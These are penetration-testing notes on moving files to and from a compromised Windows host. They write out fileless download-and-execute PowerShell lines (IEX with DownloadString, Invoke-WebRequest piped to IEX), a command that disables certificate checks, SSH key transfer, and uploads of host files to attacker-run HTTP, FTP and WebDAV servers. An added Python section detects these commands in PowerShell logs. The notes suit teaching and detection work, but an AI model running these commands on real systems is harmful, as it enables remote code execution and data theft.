
Windows File Transfer

This section contains different methods to transfer a file to or from a Windows machine.

Transfer File to Target Machine

PowerShell Base64 Encode & Decode

# Pwnbox Check SSH Key MD5 Hash
md5sum id_rsa

# Pwnbox Encode SSH Key to Base64
cat id_rsa |base64 -w 0;echo

# Copy the content, paste it into a Windows PowerShell terminal, and use PowerShell functions to decode it
PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1C----0tLQo="))

# We can confirm if the file was transferred successfully using the Get-FileHash cmdlet, which does the same thing that md5sum does.
PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

PowerShell Web Downloads

------------------- PowerShell DownloadFile Method ---------------------

PS C:\> # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFile('https://URL','C:\PATH')

PS C:\> # Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFileAsync('https://URL', 'filename.ps1')

---------------- PowerShell DownloadString - Fileless Method ----------------

PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://URL')

--------------------- PowerShell Invoke-WebRequest -----------------------

# You can use the aliases iwr, curl, and wget instead of the full Invoke-WebRequest name.
PS C:\> Invoke-WebRequest https://URL/PowerView.ps1 -OutFile PowerView.ps1

# If PowerShell shows the error "Internet Explorer first-launch configuration has not been completed", it can be bypassed using the -UseBasicParsing parameter.
PS C:\> Invoke-WebRequest https://<ip>/ -UseBasicParsing | IEX

# Another error PowerShell shows relates to the SSL/TLS secure channel when the certificate is not trusted.
# The line below bypasses it by turning off certificate validation for the current PowerShell session.
PS C:\> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
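
Seen from the detection side, the download commands above leave recognisable text in PowerShell script block logs (Event ID 4104). The following added example (not part of the original notes) matches those command forms in log records and rates the hits per host; the rule names, host names and sample records are constructed for illustration.

```python
import re
from collections import defaultdict

# Patterns mirror the command forms on this page. PowerShell is case-insensitive,
# so the regexes are too. Rule names are invented for this example.
RULES = {
    "webclient_downloadfile":
        r"Net\.WebClient\s*\)\s*\.\s*DownloadFile(Async)?\s*\(",
    "download_then_execute":
        r"\b(IEX|Invoke-Expression)\b.*\.DownloadString\s*\("
        r"|\b(Invoke-WebRequest|iwr|curl|wget)\b.*\|\s*(IEX|Invoke-Expression)\b",
    "tls_validation_disabled":
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}",
    "base64_written_to_disk":
        r"WriteAllBytes\s*\(.*FromBase64String\s*\(",
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

# Constructed records standing in for ScriptBlockText from Event ID 4104.
EVENTS = [
    {"host": "WS01", "script": r"Invoke-WebRequest https://intranet.example/report.csv -OutFile report.csv"},
    {"host": "WS02", "script": r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"},
    {"host": "WS02", "script": r"IEX (New-Object Net.WebClient).DownloadString('https://203.0.113.10/a.ps1')"},
    {"host": "WS03", "script": r"(New-Object Net.WebClient).DownloadFile('https://203.0.113.10/t.exe','C:\Users\Public\t.exe')"},
    {"host": "WS04", "script": r'[IO.File]::WriteAllBytes("C:\Users\Public\k", [Convert]::FromBase64String("QUJD"))'},
]

def match_rules(script):
    """Return the sorted names of every rule that matches one script block."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(script))

def triage(events):
    """Group hits per host and rate them; hosts without hits are omitted."""
    per_host = defaultdict(set)
    for ev in events:
        for name in match_rules(ev["script"]):
            per_host[ev["host"]].add(name)
    findings = {}
    for host, hits in per_host.items():
        # Code fetched and run in memory leaves no file to scan, and a session
        # with certificate validation off cannot authenticate its source.
        risky = "download_then_execute" in hits or (
            "tls_validation_disabled" in hits and len(hits) > 1)
        findings[host] = ("high" if risky else "medium", sorted(hits))
    return findings

if __name__ == "__main__":
    for host, (severity, hits) in sorted(triage(EVENTS).items()):
        print(host, severity, ", ".join(hits))
```

An ordinary `Invoke-WebRequest ... -OutFile` call (WS01) matches no rule, so the output lists only the hosts whose script blocks combine download with execution, write decoded Base64 to disk, or use `Net.WebClient` file downloads.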

SMB Downloads

---- without user/pass
# Create the SMB Server
sudo impacket-smbserver share -smb2support /tmp/smbshare
smbserver.py a -smb2support .
 
# Copy a File from the SMB Server
C:\> copy \\<ip>\share\nc.exe

---- with user/pass
# Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
smbserver.py a -smb2support . -username tt -password tt

# Mount the SMB Server with Username and Password
C:\> net use n: \\<ip>\share /user:test test

# Other useful commands
net use \\<ip>\share /u:df df # to connect
copy file \\<ip>\share\ # to copy a file
del file
net use /d \\<ip>\share # to remove the share connection

# Note: You can also mount the SMB server if you receive an error when you use `copy filename \\IP\sharename`.

FTP Downloads

# Installing the FTP Server Python3 Module - pyftpdlib
sudo pip3 install pyftpdlib

# Setting up a Python3 FTP Server
sudo python3 -m pyftpdlib --port 21

# Transferring Files from an FTP Server Using PowerShell
PS C:\> (New-Object Net.WebClient).DownloadFile('ftp://<ip>/file.txt', 'ftp-file.txt')

# If we do not have an interactive shell, we can create an FTP command file to download a file.
# Create a Command File for the FTP Client and Download the Target File
---
C:\> echo open <ip> > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo GET file.txt >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open <ip>
Log in with USER and PASS first.
ftp> USER anonymous

ftp> GET file.txt
ftp> bye
---

Get File from target host to our attack machine

PowerShell Base64 Encode & Decode

# Encode File Using PowerShell (Windows PowerShell 5.1 syntax; PowerShell 6+ uses -AsByteStream instead of -Encoding Byte)
PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

# Decode Base64 String in Linux
echo IyBDb3B5cmlnaH-----3N0DQo= | base64 -d > hosts
md5sum hosts

PowerShell Web Uploads

# Installing a Configured WebServer with Upload
pip3 install uploadserver
# Start an upload server
python3 -m uploadserver

----------- PowerShell Script to Upload a File to Python Upload Server -------
# PSUpload.ps1 : https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1
PS C:\> Invoke-FileUpload -Uri http://<ip>:8000/upload -File C:\Windows\System32\drivers\etc\hosts

---------------------- PowerShell Base64 Web Upload -----------------------

PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

# start a listener to get base64 encoded data from target machine and decode it 
nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts

SMB Uploads

# Installing WebDav Python modules
sudo pip install wsgidav cheroot

# Using the WebDav Python module
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

# Connecting to the Webdav Share
C:\> dir \\<ip>\DavWWWRoot

# Uploading Files using SMB
C:\> copy C:\Users\user\Desktop\SourceCode.zip \\<ip>\DavWWWRoot\

FTP Uploads

# we need to specify the option --write to allow clients to upload files to our attack host.
sudo python3 -m pyftpdlib --port 21 --write

# Use the PowerShell upload function to upload a file to our FTP Server.
PS C:\> (New-Object Net.WebClient).UploadFile('ftp://<ip>/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

# Create a Command File for the FTP Client to Upload a File
--- 
C:\> echo open <ip> > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open <ip>

Log in with USER and PASS first.

ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
---

Last updated 2 years ago